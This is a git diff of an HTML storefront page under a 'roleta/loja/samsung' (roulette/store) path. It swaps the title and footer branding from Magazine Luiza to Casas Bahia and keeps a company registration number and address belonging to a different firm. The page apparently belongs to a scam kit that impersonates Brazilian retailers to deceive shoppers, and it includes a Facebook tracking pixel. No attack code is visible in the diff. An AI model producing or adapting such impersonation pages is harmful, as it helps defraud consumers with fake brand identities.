--- a/roleta/loja/samsung/index.html
+++ b/roleta/loja/samsung/index.html
@@ -1,7 +1,7 @@
 <!DOCTYPE html><html lang="pt"><head>
     <meta charset="UTF-8">
     <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
-    <title>Magazine Luiza</title>
+    <title>Casas Bahia</title>
     <link rel="stylesheet" href="css/products.css">
     <link rel="stylesheet" href="css/styles.css">
     <link rel="stylesheet" href="css/fonts.css">
@@ -299,7 +299,7 @@ src="https://www.facebook.com/tr?id=462728540093655&ev=PageView&noscript=1"
 
     <div class="divisoria"></div>
 
-    <p style="margin-left: 3%; margin-right: 3%; font-family: 'GellixRegular'; font-size: 14px; padding-top: 5px;"><span style="font-family: 'GellixSemiBold';">Termos e condições. Como cuidamos da sua privacidade. Acessibilidade Informações sobre seguros Blog Afiliados Tendências</span><br><br>© 1999-2024 Ebazar.com.br LTDA.CNPJ n.º 03.007.331/0001-41 / Av. das Nações Unidas, nº 3.003, Bonfim, Osasco/SP - CEP 06233-903 - empresa do grupo Magazine Luiza.<span style="font-family: 'GellixSemiBold';"><br><br>Brasil/Português</span></p>
+    <p style="margin-left: 3%; margin-right: 3%; font-family: 'GellixRegular'; font-size: 14px; padding-top: 5px;"><span style="font-family: 'GellixSemiBold';">Termos e condições. Como cuidamos da sua privacidade. Acessibilidade Informações sobre seguros Blog Afiliados Tendências</span><br><br>© 1999-2024 Ebazar.com.br LTDA.CNPJ n.º 03.007.331/0001-41 / Av. das Nações Unidas, nº 3.003, Bonfim, Osasco/SP - CEP 06233-903 - empresa do grupo Casas Bahia.<span style="font-family: 'GellixSemiBold';"><br><br>Brasil/Português</span></p>
 
     <script src="js/scripts.js"></script>
 
